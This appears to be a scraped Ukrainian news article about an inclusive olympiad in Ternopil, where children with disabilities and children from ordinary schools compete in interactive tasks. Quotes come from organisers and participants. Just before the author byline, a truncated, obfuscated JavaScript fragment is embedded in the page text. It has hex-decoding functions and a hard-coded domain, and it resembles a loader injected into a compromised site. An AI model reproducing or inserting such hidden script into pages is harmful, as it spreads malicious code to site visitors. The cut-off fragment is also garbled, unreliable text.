Ви знаходитесь: Головна / Новини / В Тернополі відбулася інклюзивна олімпіада для дітей
В Тернополі відбулася інклюзивна олімпіада для дітей

В Тернополі відбулася інклюзивна олімпіада для дітей

В Тернополі відбулася інклюзивна олімпіада. Обмежені фізично, однак сильні духом та розумом, вихованці навчально-реабілітаційного центру змагалися зі звичайними дітьми в інтерактивних випробуваннях. 

Особлива олімпіада відбулася в Тернопільському навчально-реабілітаційному центрі.  Участь у ній взяли звичайні діти та діти з особливими потребами. Однак, перемозі, візки не завада, адже олімпіада – інтерактивна.

ІРИНА КОРОЛЬ, директор Тернопільського обласного навчально-реабілітаційного центру

«Сьогодні змагатимуться найменші наші вихованці, учні початкової школи, це учні 3-4 класів. І чим цікава, чим особлива ця олімпіада? Вона особлива тим, що у ній на рівних змагаються і дітки, які мають проблеми зі здоров’ям, і дітки здорові, вихованці нашого закладу, і учні загальноосвітніх шкіл міста Тернополя».

Сергій став переможцем минулої інтерактивної олімпіади, а на цей раз, каже, готовий справедливо та об’єктивно виконувати місію судді. А от секрети своєї перемоги не відкриває.

СЕРГІЙ ТКАЧУК, переможець минулої олімпіади:

«Не розкриваю, бо їх нема. Якось вдалося. Був такий конкурс «Алло, шукаю друзів», в якому члени журі мали мобільний номер кожного з учасників олімпіади і вони по черзі набирали будь-який номер, будь-якого учасника цієї олімпіади. І до кого з учасників журі подзвонили, той і мав відповідати на якесь запитання або якийсь тест вирішувати. – Сьогодні буде таке завдання? – Я думаю, що так».

Олімпіада проходила і в ігровій формі. А окрім начальних змагань, учасники мали змогу познайомитися один з одним. Фінальним етапом стало творче завдання, в якому діти спробували себе у ролі журналістів.

МИКОЛА НИКОЛИН, координатор лабораторії якості навчання обдарованої дитини

«Щоб вони брали, придумували інтерв’ю у різноманітних знаменитостей. Знаменитості, звичайно, віртуальні. Ми їх будемо подавати в комп’ютері, при чому, не фотографії, а відео. Починаючи від Президента України і, завершуючи такими, геть казковими героями, як колобок, баба Яга і так далі».

Микола Николин зізнається, підготували дітям і дипломи, і подарунки. А переможець отримає велику сову, яка є символом мудрості.

ТАРАС, учасник олімпіади

«Я розраховую, розраховую на перемогу. Щоб, не знаю, там… Перемога – це завжди все, всіх мрія».

Головними вболівальниками учасників були їхні рідні та вчителі, які спостерігали за своїми олімпійцями, під час відеотрансляції, в окремій залі.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top